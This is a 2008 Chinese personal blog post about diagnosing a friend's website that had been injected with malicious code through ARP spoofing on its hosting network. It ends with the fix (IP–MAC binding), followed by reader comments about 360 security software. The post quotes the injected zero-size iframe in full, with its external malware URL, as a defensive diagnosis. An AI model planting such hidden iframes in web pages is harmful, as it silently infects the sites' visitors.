好心情Blog

回忆过去发生的,记录现在拥有的,展望未来改变的。

Apr
21
可怕的Arp欺骗

2008-4-21 9:23:14 | 分类:[工作学习] | 引用:0 | 评论:2 | 浏览:

刚才朋友打电话过来说网站被挂马了.

打开他的网站一看, 在每个页面的DOCTYPE之前都有一个Iframe:

<iframe width="0" height="0" src="http://t.93se.com/jj/jj.htm"></iframe>

 看到后的第一印象是: 网站的包含文件被修改了. 但打开所有的包含文件看了一下,都没有这段代码呀~ 试了一会后发现: 这段代码竟然在第一个Include文件之前出现的……

怪了,难道是DNS劫持? 似乎劫持后没有这么做的呀~

难道…… 赶紧到服务器上arp -a看了一下网关的Mac地址, 然后用软件把全网段扫了一下, 网关的Mac地址竟然跟某台服务器的Mac地址相同…… 果然是传说中的Arp欺骗!

打电话让托管公司把那台机器搞定, 然后把自己的IP跟Mac绑定一下, 以后就OK了~

 

 

 

Tags: 服务器  
点击这里获取该日志的TrackBack引用地址
评论[ 2 ]
2008-4-22 10:58:20 [回复] [编辑] [删除] 第1楼. 老吧
服务器端装上360arp专杀
软件兔 于 2008-4-22 21:25:12 回复
互联网上的创业者中我最看不起的就是周鸿袆了,对他的人品极不放心.当初他的3721也是打着"安全"的旗号的,结果成了人人喊打的流氓软件代表.Angry
装360的话,总是担心哪天一开机发现"360卫士"升级成为"360流氓".所以我坚决不碰周鸿袆的东西~ 更不要说在服务器上了Sad
2008-4-23 14:35:05 [回复] [编辑] [删除] 第2楼. linker
周鸿伟这个人,估计不会令你失望的,只不过他现在应该还不会如此。
软件兔 于 2008-4-23 20:21:50 回复
现在还是他培养用户群的时期,前期不会太作恶的,否则拿不到足够多的用户,以后一次次把用户卖出去的时候,都卖不出好价格.
spirit 于 2008-5-23 1:03:12 回复
也不能说的太绝对了哟~
spirit 于 2008-5-23 1:04:00 回复
360的arp的确不错

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Blog搜索

Blog分类

RSS订阅



可能与本文相关的广告

最新评论及回复

留言本最新留言

最新文章

Tags云集

Powered by Z-Blog and Template by 软件兔. 随意转载, 但请在文章中加上本站链接:〖好心情Blog〗